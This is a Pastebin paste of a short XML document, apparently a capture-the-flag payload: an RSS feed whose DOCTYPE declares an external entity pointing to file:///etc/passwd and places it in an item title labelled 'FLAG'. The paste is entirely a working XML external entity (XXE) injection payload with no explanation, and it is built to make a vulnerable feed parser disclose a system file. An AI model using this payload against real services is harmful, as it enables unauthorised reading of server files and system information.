Advertisement
Guest User

Untitled

a guest
Apr 20th, 2019
90
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE foo [
  3. <!ELEMENT foo ANY >
  4. <!ENTITY xxe SYSTEM "file:///etc/passwd" >
  5. ]>
  6. <rss version="2.0">
  7.  
  8. <channel>
  9. <title>USELESS</title>
  10. <link>https://USELESS</link>
  11. <description>USELESS</description>
  12. <item>
  13. <title>FLAG :
  14. <foo>&xxe;</foo>
  15. </title>
  16. <link>https://USELESS</link>
  17. <description>USELESS</description>
  18. </item>
  19. </channel>
  20.  
  21. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement